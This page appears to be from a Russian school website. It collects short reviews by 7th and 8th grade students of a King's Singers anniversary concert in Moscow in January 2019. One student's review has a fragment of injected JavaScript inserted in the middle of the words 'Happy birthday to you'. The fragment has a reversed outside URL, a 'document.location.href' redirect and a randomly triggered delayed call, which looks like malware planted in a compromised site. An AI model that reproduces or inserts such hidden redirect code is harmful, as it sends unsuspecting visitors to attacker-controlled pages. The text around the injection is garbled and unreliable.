logo

Рождественский фестиваль В. Спивакова

23 января 2019 года ученики 7-8 классов в сопровождении кураторов Расторгуевой Ларисы Евстафьевны и Прошкиной Екатерины Алексеевны сходили на концерт британской группы “The King’s singers” в Московский Международный Дом Музыки. Это был Юбилейный тур к 50-летию коллектива.
Время, проведенное на концерте, оставило незабываемое и очень яркое впечатление!

Мне очень понравилось выступление группы из Великобритании «The King’s
singers»! Я в восторге от голоса, тембра и артистичности каждого из шести
исполнителей! Также мне очень понравилось, как они взаимодействовали с залом, общались со зрителями и смогли создать атмосферу, напоминающую скорее не концерт, а просто дружескую встречу. Мне, пусть я и не являюсь большим поклонником классической музыки, понравилось каждое исполненное ими произведение, а во второй части концерта они спели всем известные песни (в том числе и группы Beatles) в своём стиле (акапелла).
У одного из артистов был День Рождения. Когда его коллега сообщил об этом зрителям, весь зал начал петь песню «Happy Birthday», и это было очень трогательно, особенно реакция Джонни!
У меня остались потрясающие впечатления, и я надеюсь, что будет возможность побывать на концерте этой группы ещё раз!

Скобинова Валерия, 7 класс

 

Недавно мы посетили Дом Музыки, где проходил концерт британского ансамбля «The King’s singers». Они исполняли нам народную эстонскую, болгарскую, немецкую музыку.
Мне очень понравилось это выступление!
Осетров Арсений, 7 класс

 

В среду мы съездили в Дом Музыки. Там мы слушали концерт группы из Великобритании “The king singers”.
Они в Москве были два дня, и я очень рада, что попала на их концерт.
Они предложили отправиться в путешествие от Москвы до Великобритании. В первой части я услышала французские, эстонские, болгарские, немецкие песни. Как же прекрасно сливались их голоса! Меня это поразило и то, как они взаимодействовали с залом. В конце второй части представления они поздравляли своего коллегу Джонни с Днем Рождения. По-моему, это было очень мило, потому что весь зал начал петь популярную песню “Happy birthday”. Больше всего мне понравилась вторая часть, потому что группа исполняла современную музыку. Также я услышала песни группы “The Beatles”, а их композицию о любви я до сих пор переслушиваю!

Полякова Софья, 7 класс

23 января мы постели концерт ансамбля “The Kings Singers”, который проходил в Международном Доме Музыки. Концерт был очень интересным, потому что певцы исполняли песни разных стран, начиная от русских народных песен, заканчивая песнями английской группы «The Beatles”. Голоса исполнителей звучали очень гармонично, сливались в единое целое. Также мне понравилось, что ансамбль взаимодействовал с залом, и благодаря этому концерт был ещё интереснее. Нам было важно посетить его, потому что мы сами поем в школьном ансамбле. И это здорово — увидеть, к чему мы должны стремиться! Этот концерт оказался для меня не просто интересным, но и очень полезным и актуальным!

Саргсян Жасмин, 7 класс

В среду, 23 января, мы отправились в Московский Международный Дом Музыки, чтобы послушать известный ансамбль из Великобритании «The King’s singers». Этот концерт был уникальный, потому что певцы находились в Москве всего 2 дня!
С самого начала мне стало интересно и приятно слушать разнообразные песни, которые прекрасно показывали мастерство ансамбля. Мы погрузились в мир музыки, проделав «путешествие» от Москвы до Лондона, слушая в процессе одни из известнейших песен таких стран как Эстония, Россия, Франция, Германия, Англия. Я сразу заметила, что все певцы очень позитивные. Они не просто пели, но и работали с залом. У одного из участников в этот день был День Рождения, а когда слушателям об этом сказали, весь зал спел певцу Джонни известную песню «Happy birthday toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to you»! Это было очень мило, а ему приятно. После выступления в фойе ММДМ проходила автограф-сессия с исполнителями группы, где можно было сфотографироваться, пообщаться и получить автограф.
Я очень рада, что мне удалось побывать на таком мероприятии, потому что такой жизнерадостности и самоотдачи на концертах я ещё никогда не встречала. Спасибо большое за такую поездку!

Петлина Варвара, 7 класс

 

В среду мы ходили на концерт группы «The King’s Singers». Это одна из лучших на сегодняшний день акапельных групп мира, которая уже не одно десятилетие пользуется огромной популярностью и любовью зрителей.
В первой части исполнялись песни на 10-ти разных языках, и было ощущение, будто мы отправились в путешествие из России в Англию. Многоголосие было потрясающее! Голоса наполняли все пространство вокруг.
Но больше всего мне понравилась вторая часть, где пели знакомые песни «The Beatles». А еще было мило, когда весь зрительный зал спел «Happy Birthday» одному из вокалистов.
После концерта Яна, моя одноклассница, взяла автограф у одного из участников группы. Этот концерт был очень запоминающимся!

Глазкова Юлия, 8 класс